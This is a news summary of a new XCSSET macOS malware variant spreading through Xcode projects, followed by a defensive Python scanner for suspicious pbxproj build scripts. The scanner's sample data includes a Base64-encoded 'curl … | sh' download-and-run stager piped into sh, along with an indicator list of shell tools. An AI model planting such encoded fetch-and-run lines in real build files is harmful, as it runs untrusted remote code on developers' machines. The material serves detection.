XCSSET macOS Malware Returns with New Version

A new variant of XCSSET, a known macOS malware, has emerged with improved code obfuscation techniques and updated persistence mechanisms. Microsoft has alerted Apple developers to be cautious as the main infection vector is via Xcode projects. The malware’s capabilities remain largely unchanged, targeting digital wallet contents and gathering data from Notes and other system files.

The new XCSSET variant uses randomization in its encoding methods, making it more difficult to detect using static analysis and threat-hunting rules. Microsoft also noted that the malware now uses Base64 encoding, obfuscates module names, and introduces two new persistence methods: zshrc and dock.

XCSSET has previously targeted Xcode developers, infecting their projects, which then spread to other users through GitHub. The malware’s distribution model is considered “clever” by security researchers. Microsoft advises users to inspect and verify any Xcode projects downloaded from repositories, only install apps from trusted sources, and ensure they have the latest software updates.
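As an added example (not from the article, and not Microsoft's or Apple's tooling), the check below implements the advice to inspect downloaded Xcode projects: it pulls every run-script build phase out of a project.pbxproj and flags scripts whose raw or Base64-decoded content matches a short indicator list. It assumes injected code lands in a run-script build phase (an assumption, not something the article states); the indicator list, the stager string and the sample project fragment are constructed.

```python
import base64
import re
# Indicators for run-script build phases (constructed for this example, not XCSSET's
# real strings): decoders, remote fetches, scripting hosts and shell profile edits.
SUSPICIOUS = ("base64", "eval", "curl ", "osascript", ".zshrc", "/tmp/", "chmod +x")
# shellScript value of a PBXShellScriptBuildPhase entry in project.pbxproj.
SHELLSCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)";', re.S)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

def unescape_pbx(s: str) -> str:
    """pbxproj strings escape quotes, backslashes and newlines with backslashes."""
    return s.replace('\\"', '"').replace("\\n", "\n").replace("\\\\", "\\")

def decode_b64_blobs(script: str) -> list[str]:
    """Return every base64-looking token in the script that decodes to text."""
    out = []
    for tok in B64_RE.findall(script):
        try:
            decoded = base64.b64decode(tok, validate=True).decode("utf-8")
        except Exception:  # not valid base64 or not UTF-8 text: skip the token
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
            out.append(decoded)
    return out

def scan_pbxproj(text: str) -> list[dict]:
    """Flag build-phase scripts whose raw or base64-decoded content hits an indicator."""
    findings = []
    for m in SHELLSCRIPT_RE.finditer(text):
        script = unescape_pbx(m.group(1))
        hits = {k for k in SUSPICIOUS if k in script}
        decoded_hits = set()
        for blob in decode_b64_blobs(script):
            decoded_hits |= {k for k in SUSPICIOUS if k in blob}
        if hits or decoded_hits:
            findings.append({"script": script, "hits": sorted(hits),
                             "decoded_hits": sorted(decoded_hits)})
    return findings

# Constructed sample: one benign phase and one that pipes an encoded stager into sh.
_STAGER = "curl -s http://example.invalid/x | sh"  # placeholder, non-routable host
_ENCODED = base64.b64encode(_STAGER.encode()).decode()
SAMPLE_PBXPROJ = r'''
    AA01 /* ShellScript */ = {
        shellScript = "echo \"building\"\n";
    };
    AA02 /* ShellScript */ = {
        shellScript = "echo __ENCODED__ | base64 -D | sh\n";
    };
'''.replace("__ENCODED__", _ENCODED)
```

Run it against `path/to/Project.xcodeproj/project.pbxproj` read as text; any finding is a build phase to read by hand before opening the project in Xcode, since Xcode runs these scripts on build.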

The return of XCSSET highlights the need for vigilance among Apple developers and users. As with previous versions, this new malware variant will likely target unsuspecting programmers through infected Xcode projects.

Source: https://www.theregister.com/2025/02/17/macos_xcsset_malware_returns